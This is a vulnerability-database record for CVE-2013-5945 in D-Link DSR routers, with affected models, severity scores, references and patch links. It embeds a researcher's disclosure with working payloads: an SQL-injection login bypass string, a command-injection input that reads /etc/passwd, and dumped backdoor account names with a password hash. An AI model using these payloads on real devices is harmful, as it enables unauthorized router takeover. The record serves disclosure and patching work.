[RtmpCmdQTask] 25692 root 0 SW< [RtmpWscTask] DSR-250N>

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.05b64"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr router dsr-500",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-250n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-500n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "nu11.nu11",
    "sources": [
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2013-5945",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-5945",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.0,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2013-007216",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-15014",
            "impactScore": 8.5,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2013-5945",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2013-007216",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-5945",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2013-007216",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15014",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-319",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #\n# CVEs:                  \n#     CVE-2013-5945 - Authentication Bypass by SQL-Injection\n#     CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution\n# \n# Vulnerable Routers:    \n#     D-Link DSR-150 (Firmware \u003c v1.08B44)\n#     D-Link DSR-150N (Firmware \u003c v1.05B64)\n#     D-Link DSR-250 and DSR-250N (Firmware \u003c v1.08B44)\n#     D-Link DSR-500 and DSR-500N (Firmware \u003c v1.08B77)\n#     D-Link DSR-1000 and DSR-1000N (Firmware \u003c v1.08B77)\n#\n# Download URL:      \n#     http://tsd.dlink.com.tw\n# \n# Arch:                  \n#     mips and armv6l, Linux\n# \n# Author:                \n#     0_o -- null_null\n#     nu11.nu11 [at] yahoo.com\n#\n# Date:                  \n#     2013-08-18\n# \n# Purpose:               \n#     Get a non-persistent root shell on your D-Link DSR. \n# \n# Prerequisites:         \n#     Network access to the router ports 443 and 23. \n#     !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!\n#\n#\n# A list of identified vulns follows. This list is not exhaustive as I assume\n# more vulns are present that just slipped my attention. \n# The fact that D-Link implemented a backdoor user (for what reason, please??)\n# and just renamed it instead of completely removing it after it was targetted\n# by my previous exploit, as well as the triviality of those vulns I found \n# makes me suggest that more vulns are present that are comparably easy to\n# exploit. \n#\n# Since 2013-12-03, patches are available for:\n#   DSR-150:                Firmware v1.08B44\n#   DSR-150N:               Firmware v1.05B64\n#   DSR-250 and DSR-250N:   Firmware v1.08B44\n#   DSR-500 and DSR-500N:   Firmware v1.08B77\n#   DSR-1000 and DSR-1000N: Firmware v1.08B77\n# via http://tsd.dlink.com.tw\n#\n# And now, have a worthwhile read :-)\n#\n\n\n0. Contents:\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection \n                  (CVE-2013-5945)\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n                  (CVE-2013-5946)\n3. Exposure:      D-Link backdoor user\n4. Vulnerability: Use of weak hash algorithms\n5. Exposure:      Passwords are stored as plain text in config files\n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection\n                  (CVE-2013-5945)\n\n\n* Possible via the global webUI login form. \n\n* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:\n\n  function login.authenticate(tablename, tableInput)\n    local username = tableInput[\"Users.UserName\"]\n    local password = tableInput[\"Users.Password\"]\n    local cur = db.execute(string.format([[\n                  SELECT *, ROWID AS _ROWID_ FROM %s\n          WHERE %s = \u0027%s\u0027 AND %s = \u0027%s\u0027\n      ]], tablename, \"UserName\", username, \"Password\", password))\n    local result = false\n    local statusCode = \"NONE\"\n    if cur then\n      local row = cur:fetch({}, \"a\")\n      cur:close()\n      result = row ~= nil\n      if result == false then\n        statusCode = \"USER_LOGIN_INVALID_PASSWORD\"\n      end\n    end\n    return result, statusCode\n  end\n\n* This function creates an SQL statement of the form:\n\n  SELECT * FROM \"Users\" WHERE \"UserName\" = \u0027user\u0027 AND \"Password\" = \u0027pass\u0027;\n\n* Since there is a default admin user account called \"admin\" around, this is \n  easily exploitable by providing this to the login form:\n\n  username = admin\n  password = \u0027 or \u0027a\u0027=\u0027a\n\n* ...resulting in this SQL statement:\n\n  SELECT * \n    FROM \"Users\" \n    WHERE \"UserName\" = \u0027admin\u0027 \n      AND \"Password\" = \u0027\u0027 or \u0027a\u0027=\u0027a\u0027;\n\n* Old school SQL injection. Ohh, by the way... \n\n* The same fault can be found in captivePortal.lua \n  -- FREE NETWORKS FOR EVERYONE --\n\n\n\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n                  (CVE-2013-5946)\n\n\n* Possible from the Tools --\u003e System Check page. \n\n* File /pfrm2.0/var/www/systemCheck.htm contains:\n\n  local function runShellCmd(command)\n      local pipe = io.popen(command .. \" 2\u003e\u00261\") -- redirect stderr to stdout\n      local cmdOutput = pipe:read(\"*a\")\n      pipe:close()\n      return cmdOutput\n  end\n  if (ButtonType and ButtonType == \"ping\") then\n  [...]\n  local cmd_ping = pingprog .. \" \" .. ipToPing .. \" \" .. options1 .. \" \u003e \" .. pingfile\n        globalCmdOutput = runShellCmd (cmd_ping) \n        statusMessage = \"Pinging \" .. ipToPing\n  [...]\n  elseif (ButtonType and ButtonType == \"traceroute\") then\n  [...]\n    local cmd = traceRouteProg .. \" \" .. ipToTraceRoute .. options\n    globalCmdOutput = runShellCmd(cmd)\n    statusMessage = \"Traceroute To \" .. ipToTraceRoute .. \"...\"\n  [...]\n  elseif (ButtonType and ButtonType == \"dnslookup\") then\n  [...]\n    util.appendDebugOut(\"Exec = \" .. os.execute(nsLookupProg .. \" \" .. internetNameToNsLookup .. \" \u003e \" .. nsLookupFile))\n    statusMessage = \"DNS Lookup for \" .. internetNameToNsLookup\n  [...]\n\n* Command injection is possible in at least these form sections:\n  \n  Ping or Trace an IP Address\n  Perform a DNS Lookup\n  \n* When using a browser, deactivate the \"onclick\" JavaScript checks using \n  a tool like Firebug. Tools like curl are not hindered by these checks. \n  \n* All forms allow input like this:\n  \n  localhost;\u003ccommand\u003e\n  \n  example: \n  \n  localhost;cat /etc/passwd\n  \n* This user provided value is then directly used as part of the input for the\n  call to runShellCmd(c) and thus io.popen(c) in the first form section and \n  os.execute(c) in the second form section. \n  \n* Output from user provided commands gets displayed on the next page beneath \n  the benign command output. \n  \n  example: \n  \n  [...]\n  \u003ctextarea rows=\"15\" name=\"S1\" cols=\"60\" wrap=\"off\" class=\"txtbox1\"\u003e\n    traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets\n     1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms\n    root:!:0:0:root:/root:/bin/sh\n    gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n    nobody:x:0:0:nobody:/nonexistent:/bin/false\n    ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n  \u0026lt;/textarea\u0026gt;\n  [...]\n  \n  \n  \n3. Exposure: D-Link backdoor user:\n  \n  \n* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:\n\n  root:!:0:0:root:/root:/bin/sh\n  gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n  nobody:x:0:0:nobody:/nonexistent:/bin/false\n  ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n  guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n  admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n\n* You can see the old D-Link backdoor user name \"ZX4q9Q9JUpwTZuo7\". \n  That was the account I hacked before with my previous exploit: \n  http://www.exploit-db.com/papers/22930/\n  And there is a new backdoor user \"gkJ9232xXyruTRmY\" introduced. \n  Instead of removing the backdoor, D-Link just created a new one. \n  \n* I verified this by showing the /etc/profile:\n  \n  # /etc/profile\n  LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib\n  PATH=.:/pfrm2.0/bin:$PATH\n  CLISH_PATH=/etc/clish\n  export PATH LD_LIBRARY_PATH CLISH_PATH\n  # redirect all users except root to CLI\n  if [ \"$USER\" != \"gkJ9232xXyruTRmY\" ] ; then\n  trap \"/bin/login\" SIGINT\n  trap \"\" SIGTSTP\n  /pfrm2.0/bin/cli\n  exit\n  fi\n  PS1=\u0027DSR-250N\u003e \u0027\n  \n  \n  \n4. Vulnerability: Use of weak hash algorithms:\n\n\n* In the /etc/shadow, salted DES hashes are used to store user passwords. \n  Since this hash type supports at most 8 characters, users can log in by just \n  typing the first 8 letters of their passwords when using SSH or telnet. \n  \n* An effective password length limitation of 8 characters makes brute force \n  attacks on user accounts very feasible, even if the user chose a longer \n  password. \n\n\n\n5. Exposure: Passwords are stored as plain text in config files:\n\n\n* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the \n  /tmp/system.db is built on boot time, reveals that all user passwords are \n  stored in plain text. \n\n  Example:\n\n  [...]  \n  Users = {}\n  Users[1] = {}\n  Users[1][\"Capabilities\"] = \"\"\n  Users[1][\"DefaultUser\"] = \"1\"\n  Users[1][\"UserId\"] = \"1\"\n  Users[1][\"FirstName\"] = \"backdoor\"\n  Users[1][\"OID\"] = \"0\"\n  Users[1][\"GroupId\"] = \"1\"\n  Users[1][\"UserName\"] = \"gkJ9232xXyruTRmY\"\n  Users[1][\"Password\"] = \"thisobviouslyisafakepass\"\n  Users[1][\"UserTimeOut\"] = \"10\"\n  Users[1][\"_ROWID_\"] = \"1\"\n  Users[1][\"LastName\"] = \"ssl\"\n  [...]\n  \n  \n  \n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n* This file should have 600 permissions set and not 644. It is world readable. \n  Pointless, since every process runs as root, no user separation is \n  done anyway. \n\n  DSR-250N\u003e ls -l -a /etc/shadow\n  -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow\n  DSR-250N\u003e ps\n    PID USER       VSZ STAT COMMAND\n      1 root      2700 S    init\n      2 root         0 SW\u003c  [kthreadd]\n      3 root         0 SW\u003c  [ksoftirqd/0]\n      4 root         0 SW\u003c  [events/0]\n      5 root         0 SW\u003c  [khelper]\n      8 root         0 SW\u003c  [async/mgr]\n    111 root         0 SW\u003c  [kblockd/0]\n    120 root         0 SW\u003c  [khubd]\n    123 root         0 SW\u003c  [kseriod]\n    128 root         0 SW\u003c  [kslowd]\n    129 root         0 SW\u003c  [kslowd]\n    150 root         0 SW   [pdflush]\n    151 root         0 SW   [pdflush]\n    152 root         0 SW\u003c  [kswapd0]\n    200 root         0 SW\u003c  [aio/0]\n    210 root         0 SW\u003c  [nfsiod]\n    220 root         0 SW\u003c  [crypto/0]\n    230 root         0 SW\u003c  [cns3xxx_spi.0]\n    781 root         0 SW\u003c  [mtdblockd]\n    860 root         0 SW\u003c  [usbhid_resumer]\n    874 root         0 SW\u003c  [rpciod/0]\n    903 root         0 SWN  [jffs2_gcd_mtd4]\n    909 root         0 SWN  [jffs2_gcd_mtd5]\n    918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R\n    999 root      1816 S \u003c  /pfrm2.0/udev/sbin/udevd --daemon\n   1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db\n   1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db\n   1049 root      2704 S    /usr/sbin/telnetd -l /bin/login\n   1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd\n   1141 root     37000 S    /pfrm2.0/bin/sshd\n   1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5\n   1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db\n   1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5\n   1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db\n   1560 root         0 SW\u003c  [key_timehandler]\n   1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf\n   1600 root      8036 S    rvgd /tmp/system.db\n   1612 root         0 SW   [cavium]\n   1621 root      8424 S    vpnKAd /tmp/system.db\n   1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d\n   1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d\n   1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd\n   1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh\n   1771 root      2680 S    /pfrm2.0/bin/statusD\n   1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db\n   1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db\n   1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db\n   2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db\n   2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db\n   2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db\n   2205 root      1904 S    /pfrm2.0/bin/fReset\n   2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh\n   2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100\n   2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va\n   2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va\n   3355 root      1768 S    /pfrm2.0/bin/rt2860apd\n   3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va\n   3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va\n   3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var\n   3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid\n   3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c\n   3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-\n   5353 root      2704 S    -sh\n   7877 root      2568 S    sleep 60\n   7953 root      2568 S    sleep 60\n   8008 root      2704 R    ps\n  16749 root      2704 S    -sh\n  25690 root         0 SW\u003c  [RtmpCmdQTask]\n  25692 root         0 SW\u003c  [RtmpWscTask]\n  DSR-250N\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-5945",
        "trust": 3.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 2.4
      },
      {
        "db": "BID",
        "id": "64172",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "id": "VAR-202002-0660",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:08:28.136000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.dlink.com/"
      },
      {
        "title": "Patch for SQL Injection Vulnerability for D-Link DSR Router Series",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/41586"
      },
      {
        "title": "D-Link DSR Router Series SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108894"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5945"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5945"
      },
      {
        "trust": 0.6,
        "url": "http://www.linuxidc.com/linux/2013-12/93897.htm"
      },
      {
        "trust": 0.3,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.exploit-db.com/papers/22930/"
      },
      {
        "trust": 0.1,
        "url": "http://tsd.dlink.com.tw"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5946"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "PACKETSTORM",
